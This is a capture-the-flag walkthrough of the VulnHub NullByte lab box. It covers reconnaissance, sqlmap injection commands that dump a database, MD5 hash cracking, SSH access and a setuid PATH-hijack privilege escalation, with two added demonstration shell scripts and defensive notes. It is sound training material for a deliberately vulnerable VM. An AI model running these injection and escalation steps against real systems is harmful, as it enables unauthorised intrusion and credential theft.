VulnHub’s NullByte: A Walkthrough
Hello readers,
Since this was my first time laying a hand on a CTF box, I wasn't exactly sure what lay ahead or what I might encounter.
NOTE: Since the box's IP address will differ for everyone, I refer to it simply as <IP Address> throughout the article.
Let’s start
The credit for creating this box goes to ly0n. First of all, thanks for creating this box.
You can download the box's zip file from http://ly0n.me/nullbyte/NullByte.ova.zip. Extract it and load the .ova file into VMware, which is the recommended hypervisor.
Your own Kali VM (attacker machine) and the box VM (victim machine) should be running at the same time on VMware, attached to the same virtual network (host-only or NAT), otherwise the attacker will not be able to see or reach the target.
RECONNAISSANCE
The first aim is to locate the box from our Kali VM, i.e. to learn its IP address. We run the 'netdiscover' command in a terminal; it finds live hosts on the local network by ARP.
NOTE: The victim's IP address need not be the same every time, since it is handed out by DHCP on each boot.
We now run a SYN nmap scan against the target. I chose it so as to create less noise.
The first thing I want to probe is the HTTP port (80). It might turn up something interesting.
Open the Firefox browser and type in the URL.
URL-http://<IP Address>:80
This is what we find. I am getting spooky Illuminati vibes here.
Right-clicking the page shows that the GIF can be saved. Keep note of the path you download the GIF file to.
ENUMERATION
We now run exiftool on the image. Exiftool extracts metadata (EXIF tags, comments and similar fields) from images and many other file types.
Command-exiftool <Path of gif file>
The standard metadata is unremarkable, but the GIF carries a Comment field. The string in it looks like a possible directory name on the web server.
Hoping our hunch is right, we append that string to the site's URL in the browser.
URL-http://<IP>/kzMb5nVYJw
A plain web page with a single "key" input is presented to us. I didn't want to jump the gun by running hydra against it.
Where there is a login form there is probably a database behind it. Let's try sqlmap against the search script in that directory, passing its usrtosearch parameter as the injection point.
Command-sqlmap -u "http://<IP>/kzMb5nVYJw/420search.php?usrtosearch=1" --dbs
sqlmap finds 5 databases behind the page.
Skipping the first 3 databases, we target the 'seth' database and dump all of its tables and columns.
Command-sqlmap -u "http://<IP>/kzMb5nVYJw/420search.php?usrtosearch=1" -D seth --dump
The dump gives us the following 2 entries.
At first glance, the password field looks like an MD5 hash (32 hex characters). MD5 is a hash, not an encoding or a cipher, so it cannot be decrypted; but an unsalted MD5 of a common password can be reversed by looking it up in a table of precomputed hashes, which is what sites such as MD5decrypt.org do. We use that site to look it up.
I tried the password on the login page we encountered earlier, but nada.
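The lookup the previous step relies on, as an added example that is not part of the original walkthrough: a dictionary attack on an unsalted MD5 hash, which is all an online "MD5 decrypt" service does at larger scale. The hash and the four-word list below are constructed for the demo (the hash is md5("letmein"), not the value dumped from the box); on a real engagement you would point crack_md5 at a wordlist such as rockyou.txt.

```sh
#!/bin/sh
# Added example: reversing an unsalted MD5 hash by dictionary lookup.
# Not code from the walkthrough. Works with GNU md5sum or BSD md5.

# md5_hex WORD -> lowercase hex MD5 of WORD (the trailing newline is NOT hashed,
# which is what trips up `echo word | md5sum`).
md5_hex() {
  if command -v md5sum >/dev/null 2>&1; then
    printf '%s' "$1" | md5sum | cut -d' ' -f1
  else
    printf '%s' "$1" | md5 -q      # BSD/macOS fallback
  fi
}

# crack_md5 HASH WORDLIST_FILE -> prints the first word whose MD5 equals HASH
# and returns 0; prints nothing and returns 1 if no candidate matches.
# MD5 is never "decrypted": each candidate is hashed and compared.
crack_md5() {
  hash=$(printf '%s' "$1" | tr 'A-F' 'a-f')
  while IFS= read -r word || [ -n "$word" ]; do
    [ -z "$word" ] && continue
    if [ "$(md5_hex "$word")" = "$hash" ]; then
      printf '%s\n' "$word"
      return 0
    fi
  done < "$2"
  return 1
}

# Constructed mini wordlist standing in for a real one.
make_wordlist() {
  cat > "$1" <<'EOF'
123456
password
letmein
qwerty
EOF
}

# demo -> runs the lookup against the constructed hash; exit status 0 on a hit.
demo() {
  list=$(mktemp)
  make_wordlist "$list"
  target="0d107d09f5bbe40cade3de5c71e9e9b7"   # constructed: md5("letmein")
  if crack_md5 "$target" "$list"; then rc=0; else rc=1; fi
  rm -f "$list"
  return $rc
}
```

The same loop is why a salted, slow hash (bcrypt, scrypt, Argon2) is the fix on the defending side: a per-user salt defeats the precomputed table, and a deliberately slow function makes even a small wordlist expensive.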
GAINING ACCESS
Trying the possibility of an SSH remote login on the default port, we find:
An alternative is to pass the port number explicitly to the ssh command with its port switch (-p), since the service here is not on port 22. Then enter the credentials we obtained earlier.
We are IN!
MAINTAINING ACCESS
Our next task is to escalate privileges.
It seems basic commands such as 'ls', 'ls -la' etc. won't work.
Let's check the bash history, i.e. the record of commands previously run by a user on this VM. We target ramses' bash history.
Command-cat /home/ramses/.bash_history
We get this:-
procwatch appears to be an executable file. Let's probe it.
The path of the executable is /var/www/backup/procwatch.
Upon running it, we find:-
The output looks like that of a process listing, and 3 processes are shown. Among them is an sh that procwatch spawned to run its child command, and that shell runs with the binary's privileges, which are higher than those of the 'ramses' user. To confirm why, check the file's permissions with ls -l: a setuid bit (an 's' in the owner's execute position) means the program runs as the file's owner, not as whoever launches it.
One of the countless ways to elevate privileges from here is to manipulate an environment variable, PATH: if procwatch runs its child command by bare name rather than by absolute path, a directory we control placed first in PATH makes the privileged shell execute our program in its place. The stepwise procedure follows.
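The PATH hijack just described, as an added example that is not the walkthrough's own commands. It assumes that procwatch invokes ps through sh by bare name (consistent with the sh shown in the process listing), and it stands in for the real binary with a constructed shell script in a scratch directory. Everything runs as the current user, so no privilege is actually gained here; the point is to show which ps ends up executing and why.

```sh
#!/bin/sh
# Added example: PATH hijack against a program that runs a command by bare name.
# Not the walkthrough's commands. The "victim" below is a constructed stand-in
# for /var/www/backup/procwatch and is not setuid, so nothing is elevated.

# Stand-in victim: runs `ps` via sh -c, the same resolution a system("ps")
# call in a C binary would go through (bare name -> searched along $PATH).
make_victim() {
  cat > "$1/procwatch" <<'EOF'
#!/bin/sh
sh -c "ps"
EOF
  chmod +x "$1/procwatch"
}

# Plant a fake `ps` in an attacker-controlled directory. On the real box this
# would exec /bin/sh to keep the privileged shell; here it only proves it ran.
plant_fake_ps() {
  cat > "$1/ps" <<'EOF'
#!/bin/sh
printf 'HIJACKED ps running as uid %s\n' "$(id -u)"
EOF
  chmod +x "$1/ps"
}

# run_victim DIR HIJACK -> runs the victim and prints its first output line.
# With HIJACK=1 the attacker directory is prepended to PATH first; that is the
# entire attack.
run_victim() {
  if [ "$2" = 1 ]; then
    PATH="$1:$PATH" "$1/procwatch" | head -n 1
  else
    "$1/procwatch" | head -n 1
  fi
}

# which_ps_ran DIR HIJACK -> "HIJACKED" if our ps executed, "genuine" otherwise
# (also "genuine" if the system has no ps at all: ours still did not run).
which_ps_ran() {
  case "$(run_victim "$1" "$2")" in
    HIJACKED*) echo HIJACKED ;;
    *)         echo genuine ;;
  esac
}

# demo -> shows both runs side by side and cleans up.
demo() {
  work=$(mktemp -d)
  make_victim "$work"
  plant_fake_ps "$work"
  echo "without PATH hijack: $(which_ps_ran "$work" 0)"
  echo "with PATH hijack:    $(which_ps_ran "$work" 1)"
  rm -rf "$work"
}
```

Two things to check before trying this on a real target. First, confirm the binary is setuid and that it really does call the child by bare name (ls -l on the file, and strings on it to see the command it runs); without both, hijacking PATH gets you a shell as yourself. Second, if the fake ps spawns bash rather than dash, bash drops the effective uid back to the real uid unless started with -p, so the elevated prompt silently disappears. The fix on the defending side is the mirror image: setuid programs must use absolute paths or reset PATH (and the rest of the environment) before running anything.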
LEVERAGING PRIVILEGES
Upon executing procwatch with our PATH in place, we gain an elevated prompt.
Upon 'cat'-ing the proof.txt file, we get:
Yes. Pwned!
REPORTING
Well, there you have it!
Conclusion:-
This is surely a good box to start off with, and while it may not reach the level of skill required to hack into HTB boxes, well, you need to start somewhere to end up somewhere.
After my initial CTF box attempt, I have begun poking around each new box and reaching dead ends on my own before consulting writeups. I advise others to do the same.
References:-
These are the resources that I used:-